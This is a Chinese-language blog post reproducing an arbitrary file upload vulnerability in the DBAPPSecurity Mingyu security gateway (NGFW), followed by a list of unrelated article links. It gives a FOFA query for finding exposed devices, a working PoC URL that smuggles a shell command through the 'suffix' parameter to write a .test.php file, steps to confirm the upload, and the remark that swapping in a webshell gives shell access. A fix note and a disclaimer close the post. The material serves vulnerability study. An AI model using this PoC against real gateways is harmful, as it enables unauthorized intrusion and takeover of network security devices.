当前位置: 首页 > news >正文

明御安全网关任意文件上传漏洞复现

简介

安恒信息明御安全网关(NGFW) 秉持安全可视、简单有效的理念,以资产为视角的全流程防御的下一代安全防护体系,并融合传统防火墙、入侵防御系统、防病毒网关、上网行为管控、VPN网关、威胁情报等安全模块于一体的智慧化安全网关。

较低版本的系统存在任意文件上传漏洞,可导致直接getshell。

漏洞复现

FOFA语法:

title="明御安全网关"

访问页面如下:

POC:

/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1%7Cecho+%22test123%22+%3E+.test.php

拼接URL尝试访问

若返回响应信息中存在 success 字符,代表文件已经上传成功 

访问拼接上传的文件路径url:

https://IP:PORT/webui/.test.php

文件上传成功,访问看到上传的内容

将上传的文件内容换成webshell则可导致getshell

修复建议

厂商已发布新版本做出修复

升级至最新版本

免责声明

该文章仅供学习用途,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。


结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

http://www.lryc.cn/news/220659.html

相关文章:

  • JVM虚拟机:如何查看自己的JVM默认的垃圾回收器
  • 目标检测YOLO系列从入门到精通技术详解100篇-【目标检测】机器视觉
  • 设计模式——建造者模式
  • Go语言用Colly库编写的图像爬虫程序
  • 14.2 并发与竞争实验
  • 【MediaTek】T750实现Host 网络和Guest 网络隔离以及各个连接终端间隔离功能
  • 数字滤波器之高通滤波器设计
  • 【leetcode】58.最后一个单词的长度
  • 用Java(C语言也可以看)实现冒泡排序和折半查找(详细过程图)+逆序数组
  • antd本地上传excel文件并读取文件的数据转为json
  • BI数据可视化:不要重复做报表,只需更新数据
  • fiddler抓包拦截请求转发到其他地址
  • 【Shell编程】| if 判断
  • Java手动引入Maven依赖的Jar包
  • 计算机毕设 基于大数据的社交平台数据爬虫舆情分析可视化系统
  • conda取消自动进入base环境
  • 【文生图】Stable Diffusion XL 1.0模型Full Fine-tuning指南(U-Net全参微调)
  • STM32笔记—DMA
  • 机器学习概论
  • 卡尔曼家族从零解剖-(04)贝叶斯滤波→细节讨论,逻辑梳理,批量优化
  • 小菜React
  • 新手用mac电脑,对文件的疑问和gpt回应
  • LeetCode|动态规划|392. 判断子序列、115. 不同的子序列、 583. 两个字符串的删除操作
  • vscode 阅读 android以及kernel 源码
  • Intel oneAPI笔记(3)--jupyter官方文档(SYCL Program Structure)学习笔记
  • verilog——移位寄存器
  • C++11 多线程学习笔记
  • nn.embedding函数详解(pytorch)
  • gitee.com[0: xxx.xx.xxx.xx]: errno=Unknown error
  • bug: https://aip.baidubce.com/oauth/2.0/token报错blocked by CORS policy